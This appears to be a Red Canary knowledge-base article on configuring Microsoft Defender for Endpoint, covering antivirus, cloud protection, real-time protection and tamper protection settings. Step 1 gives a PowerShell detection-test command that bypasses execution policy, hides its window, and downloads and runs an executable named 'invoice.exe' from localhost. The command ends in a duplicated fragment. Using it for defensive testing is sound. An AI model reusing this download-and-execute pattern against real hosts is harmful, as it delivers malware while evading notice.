Login
      Contents x
      Configuration Essentials
      • 18 Jun 2024
      • 3 Minutes to read
      • PDF
      Contents

      Configuration Essentials

      • Updated on 18 Jun 2024
      • 3 Minutes to read
      • PDF
      Article summary

      This article provides some configurations you can use with Microsoft Defender for Endpoint and Red Canary. This article is an adaptation of a presentation. You can view the slides, which contain additional details and images, by clicking the image below.

      As part of Microsoft’s suite of integrated threat protection products, Defender for Endpoint is a key component of many users' security plans. Red Canary configuration suggestions can be applied to Defender for Endpoint using several different management solutions, depending on your architecture. For example, Endpoint Manager (Intune), Group Policy, and so on. You only need to apply these configurations in your primary configuration management solution.

      For a guided walkthrough of these sections, review this video:

      Step 1: Validate your EDR deployment

      First you’ll generate a test alert in order to ensure your Defender for Endpoint deployment is fully operational.

      1. On an endpoint that has Defender installed, create the folder C:\test-MDATP-test.

      2. Open PowerShell with elevated permissions, and then execute the following command:

        powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'MDATP-test\\invoice.exe'

      3. Check the Defender for Endpoint dashboard for your test alert.

        mceclip6.png

      Step 2: Ensure Microsoft Defender Antivirus is running in active mode

      In order for Defender for Endpoint policies to function, Defender Antivirus must be the active antivirus solution on the system.

      To check whether Defender Antivirus is running in active mode, open PowerShell and run Get-MPComputerStatus | Select AMRunningMode. The output should look like this:

      > Get-MPComputerStatus | Select AMRunningMode
AMRunningMode
-------------
Normal

      For more information about why Defender Antivirus might switch to passive mode, see Microsoft Defender Antivirus and non-Microsoft antivirus/antimalware solutions.

      Step 3: Configure Next Generation Protection (NGAV)

      Next, you'll configure the core NGAV features by using either the Local Group Policy Editor or Endpoint Manager. The core NGAV features are cloud-delivered protection, which uses Microsoft Advanced Protection Services (MAPS) to assess binary threats in real time, and real-time protection, which includes always on, real-time monitoring, and heuristics to identify threats.

      Option 1: Configure NGAV using Group Policy

      1. Open the Local Group Policy Editor.

      2. Click Computer ConfigurationAdministrative TemplatesWindows Components, then select Microsoft Defender Antivirus.

      3. Enable Allow antimalware service to start up with normal priority.

      4. Click Real-time Protection, and configure your settings to match the following:

        Setting

        State

        Turn off real-time protection

        Disabled

        Turn on behavior monitoring

        Enabled

        Scan all downloaded files and attachments

        Enabled

        Monitor file and program activity on your computer

        Enabled

        Turn on raw volume write notifications

        Enabled

        Turn on process scanning whenever real-time protection is enabled

        Enabled

        Define the maximum size of downloaded files and attachments

        Enabled

        Configure local setting override for turn on behavior monitoring

        Disabled

        Configure local setting override for scanning all downloaded files and attachments

        Disabled

        Configure local setting override for monitoring file and program activity on your computer

        Disabled

        Configure local setting override to turn on real-time protection

        Disabled

        Configure local setting override for monitoring for incoming and outgoing file activity

        Disabled

        Configure monitoring for incoming and outgoing file and program activity

        Disabled

      5. Click MAPS.

      6. Click Join Microsoft MAPS, select Enabled, select Basic MAPS, and then click Ok.

      7. Click Send file samples when further analysis is required, select Enabled, select Send all samples, and then click Ok.

      Option 2: Configure NGAV using Endpoint Manager

      1. Log in to https://endpoint.microsoft.com/.

      2. Click Endpoint Security, Antivirus, and then click Create Policy.

      3. Under Platform, select Windows 10 and later.

      4. Under Profile, select Windows Defender Antivirus.

      5. Click Create, enter a name and description, and then click Next.

      6. Under Cloud protection, configure the following settings:

        Setting

        State

        Turn on cloud-delivered protection

        Yes

        Cloud-delivered protection level

        High plus

      7. Under Real-time protection, configure the following settings:

        Setting

        State

        Turn on real-time protection

        Yes

        Enable on access protection

        Yes

        Monitoring for incoming and outgoing files

        Monitor all files

        Turn on behavior monitoring

        Yes

        Turn on intrusion protection

        Yes

        Enable network protection

        Enable

        Scan all downloaded files and attachments

        Yes

        Scan scripts that are used in Microsoft browsers

        Yes, if using Microsoft browsers

        Scan network files

        No

        Scan emails

        Yes

      8. Click Next three times, and then click Create.

      Step 4: Enable tamper protection

      Tamper protection prevents malicious software from taking actions like disabling antivirus and removing security updates. You will need to enable tamper protection using either the Microsoft 365 Defender portal or Endpoint Manager.

      Tip: Red Canary recommends that you enable tamper protection using the 365 Defender portal. If you use Windows Server 2016 or Windows versions 1709, 1803, or 1809, you might need to use PowerShell to determine the tamper protection status.

      Option 1: Enable tamper protection using 365 Defender

      1. Log in to https://security.microsoft.com/.

      2. Click SettingsEndpoints, then select Advanced features.

      3. Turn on Tamper protection.

      4. Click Save preferences.

      Option 2: Enable tamper protection using Endpoint Manager

      1. Log in to https://endpoint.microsoft.com/.

      2. Click Devices, Configuration profiles, and then click Create profile.

      3. Under Platform, select Windows 10 or later.

      4. Under Profile type, select Endpoint protection.

      5. Click Create, enter a name and description, and then click Next.

      6. Select Microsoft Defender Security Center.

      7. From the Tamper Protection dropdown, select Enabled.

      8. Click Next three times, and then click Create.

      Was this article helpful?
      What's Next
      PRODUCTS
      USE RED CANARY
      SUPPORT
      Change password!
      Changing your password will log you out immediately. Use the new password to log back in.
      Change profile
      Success!
      First name must have atleast 2 characters. Numbers and special characters are not allowed.
      Last name must have atleast 1 characters. Numbers and special characters are not allowed.
      Enter a valid email
      Enter a valid password
      Your profile has been successfully updated.
      Logout